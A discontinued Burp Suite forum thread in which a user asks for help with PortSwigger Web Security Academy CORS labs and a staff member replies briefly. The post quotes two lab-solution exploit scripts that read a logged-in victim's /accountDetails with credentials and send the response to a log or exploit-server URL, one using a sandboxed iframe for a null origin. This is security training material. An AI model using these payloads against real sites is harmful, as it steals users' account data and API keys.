Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Facing problems with CORS module labs

Antonio | Last updated: May 03, 2024 07:27AM UTC

I'm trying to achieve the CORS module labs but something seems wrong with them. For example, in this (https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack) face the following issues: - My exploit, same as found in Solution section: <script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','0ad900cf044f78d4845e81e10014002a.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script> - Error: Getting "Resource not found" in log page (key parameter). After inspecting the request with burp I can see that the session cookie is not present, so I get a "Unauthorized" message with /accountDetails request. If I change the exploit, adding the "https://" prefix I get this error: "Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://0ad900cf044f78d4845e81e10014002a.web-security-academy.net/accountDetails. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing)". Inspecting the request it has right endpoint, but the cookie value is not the expected In the following lab (https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) - My exploit, same as found in Solution section: <iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','0aee004b04bbac1980ed58c600a500ac.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='exploit-0acc00f704c1ace18096571101eb0001.exploit-server.net/log?key='+encodeURIComponent(this.responseText); }; </script>"></iframe> - Error: It is trying to read the resource "https://exploit-0ab7005b04fe6c91800ad93701970039.exploit-server.net/0a49007a04786cee800cda1b005e003c.web-security-academy.net/accountDetails", so it fails and get stuck I modify the exploit adding the prefix "https://" and I get this error: "Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at https://0a49007a04786cee800cda1b005e003c.web-security-academy.net/accountDetails. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing)". Something is wrong, because inspecting the request it has null origin and right endpoint (as expected), but the cookie value is not the expected (as happened in the previous lab)

Ben, PortSwigger Agent | Last updated: May 03, 2024 08:41AM UTC

Hi Antonio, Out of interest, if you use the https prefix and deliver your exploit do you subsequently see the API key in the logs?

Antonio | Last updated: May 03, 2024 07:30PM UTC